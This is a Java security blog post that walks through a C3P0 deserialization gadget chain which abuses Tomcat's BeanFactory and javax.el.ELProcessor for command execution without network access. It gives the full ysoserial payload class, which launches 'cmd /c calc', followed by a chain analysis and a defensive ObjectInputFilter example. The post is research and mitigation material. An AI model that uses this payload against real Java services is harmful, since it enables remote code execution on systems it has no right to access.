[Java Security] Learning C3P0 deserialization exploitation without outbound network access
Posted by Y4tacker
Reference article
This post reproduces an article by 雨了个雨. The idea is very neat; once you have read it, it is essentially the same approach as the JNDI bypass for 8u191 and later, which I will reproduce and study later.
Constructing the gadget chain
Having gone through the basic Ysoserial flow yesterday, this one is relatively simple. The difference is that the Ysoserial payload later uses a URLClassLoader, whereas this one uses the current thread's ClassLoader. I always thought that was useless, which only shows how little I had learned: the author came up with the idea of going through Tomcat's getObjectInstance method to call ELProcessor's eval method and achieve expression injection.
package ysoserial.payloads;

import java.io.PrintWriter;
import java.sql.SQLException;
import java.sql.SQLFeatureNotSupportedException;
import java.util.logging.Logger;
import javax.naming.NamingException;
import javax.naming.Reference;
import javax.naming.Referenceable;
import javax.naming.StringRefAddr;
import javax.sql.ConnectionPoolDataSource;
import javax.sql.PooledConnection;
import com.mchange.v2.c3p0.PoolBackedDataSource;
import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;
import org.apache.naming.ResourceRef;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;

/**
 * yulegeyu modified
 *
 * Chain: PoolBackedDataSourceBase.readObject() -> ReferenceSerialized.getObject()
 * -> referenceToObject() -> org.apache.naming.factory.BeanFactory.getObjectInstance(),
 * which instantiates the class named in the Reference (javax.el.ELProcessor) and,
 * because of the "forceString" address, calls its eval() method with the supplied
 * expression. Everything is resolved by the current thread's ClassLoader, so no
 * outbound connection is required.
 */
@PayloadTest ( harness="ysoserial.test.payloads.RemoteClassLoadingTest" )
@Dependencies( { "com.mchange:c3p0:0.9.5.2" ,"com.mchange:mchange-commons-java:0.2.11"} )
@Authors({ Authors.MBECHLER })
public class C3P0Tomcat implements ObjectPayload<Object> {

    public Object getObject ( String command ) throws Exception {
        // Instantiate the entry-point class without running its constructor, then plant
        // our Referenceable data source in the field that readObject() will restore.
        PoolBackedDataSource b = Reflections.createWithoutConstructor(PoolBackedDataSource.class);
        Reflections.getField(PoolBackedDataSourceBase.class, "connectionPoolDataSource")
            .set(b, new PoolSource("org.apache.naming.factory.BeanFactory", null));
        return b;
    }

    // Serialized as a Reference (via Referenceable); c3p0 resolves it back on readObject().
    private static final class PoolSource implements ConnectionPoolDataSource, Referenceable {

        private String className;
        private String url;

        public PoolSource ( String className, String url ) {
            this.className = className;
            this.url = url;
        }

        public Reference getReference () throws NamingException {
            // Tomcat's BeanFactory will reflectively instantiate javax.el.ELProcessor
            // and call the setter-like method named by "forceString" ("x" -> eval()).
            ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,
                    "org.apache.naming.factory.BeanFactory", null);
            ref.add(new StringRefAddr("forceString", "x=eval"));
            String cmd = "calc";
            ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"javascript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['cmd','/c','" + cmd + "']).start()\")"));
            return ref;
        }

        // Remaining ConnectionPoolDataSource methods are never used; stubbed out.
        public PrintWriter getLogWriter () throws SQLException { return null; }
        public void setLogWriter ( PrintWriter out ) throws SQLException {}
        public void setLoginTimeout ( int seconds ) throws SQLException {}
        public int getLoginTimeout () throws SQLException { return 0; }
        public Logger getParentLogger () throws SQLFeatureNotSupportedException { return null; }
        public PooledConnection getPooledConnection () throws SQLException { return null; }
        public PooledConnection getPooledConnection ( String user, String password ) throws SQLException { return null; }
    }

    public static void main ( final String[] args ) throws Exception {
        PayloadRunner.run(C3P0Tomcat.class, new String[]{"calc"});
    }
}
Analysis of the gadget chain
Some of the finer details are skipped here, since they were covered in the Ysoserial analysis; let's just briefly trace the call chain, starting from readObject in PoolBackedDataSourceBase.
The first object recovered is a ReferenceSerialized, which is an instance of IndirectlySerialized.
Follow the call into getObject, and then further into referenceToObject.
Unlike before, this time we make var11 null.
Here org.apache.naming.factory.BeanFactory is instantiated.
As mentioned above, org.apache.naming.factory.BeanFactory, in getObjectInstance(), instantiates via reflection whatever Bean class the Reference points to, and calls setter methods to assign all of its properties. The class name, property names and property values of that Bean class all come from the Reference object and are entirely attacker-controlled.
Reflective invocation
You can see that it triggers successfully here.
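The analysis above shows that the entire chain is carried by a serialized Reference that only has to reach an ObjectInputStream; nothing needs to be fetched from the network. The following is an added example (not code from the original post, from 雨了个雨, or from ysoserial) showing the corresponding mitigation on the receiving side: a JDK 9+ ObjectInputFilter (JEP 290) that rejects the c3p0, Tomcat naming and javax.naming packages before any of their classes are instantiated, while still allowing ordinary objects through. The filter pattern string is an assumed policy for this demo, and the javax.naming.Reference it deserializes is a constructed sample with the same shape as the one the payload builds.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.HashMap;
import java.util.Map;
import javax.naming.Reference;
import javax.naming.StringRefAddr;

public class C3P0DeserializationFilterDemo {

    // Assumed policy (not from the original post): reject the c3p0 entry classes, the
    // Tomcat BeanFactory package and JNDI Reference objects, cap the object-graph depth,
    // and let everything else through (the trailing "*" is the allow-all fallback).
    // Patterns are evaluated left to right; the first match decides.
    static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(
            "maxdepth=16;!com.mchange.**;!org.apache.naming.**;!javax.naming.**;*");

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    // Deserialize with the filter installed on this stream. A rejected class causes
    // readObject() to throw InvalidClassException before the class is resolved, so no
    // readObject()/getReference() logic of the rejected type ever runs.
    static Object deserializeFiltered(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            ois.setObjectInputFilter(FILTER);
            return ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        // Benign object: passes the filter via the "*" fallback.
        Map<String, String> benign = new HashMap<>();
        benign.put("user", "alice");
        System.out.println("benign map: " + deserializeFiltered(serialize(benign)));

        // Constructed sample: a JNDI Reference naming the Tomcat BeanFactory and carrying
        // a "forceString" address, i.e. the shape of the object the chain hands to
        // BeanFactory.getObjectInstance(). The filter rejects it at the javax.naming.Reference
        // class, so the factory is never looked up or instantiated.
        Reference ref = new Reference("javax.el.ELProcessor",
                "org.apache.naming.factory.BeanFactory", null);
        ref.add(new StringRefAddr("forceString", "x=eval"));
        try {
            deserializeFiltered(serialize(ref));
            System.out.println("Reference accepted: filter is not effective");
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The same policy can be applied process-wide without touching application code by setting the jdk.serialFilter system property to the pattern string; a per-stream filter as above is preferable where the code path that deserializes untrusted input is known, because it can be stricter than the global default. On a deployment that does not need c3p0 data sources to be deserialized at all, a deny-by-default allowlist (naming only the expected classes, ending in "!*") is the stronger choice.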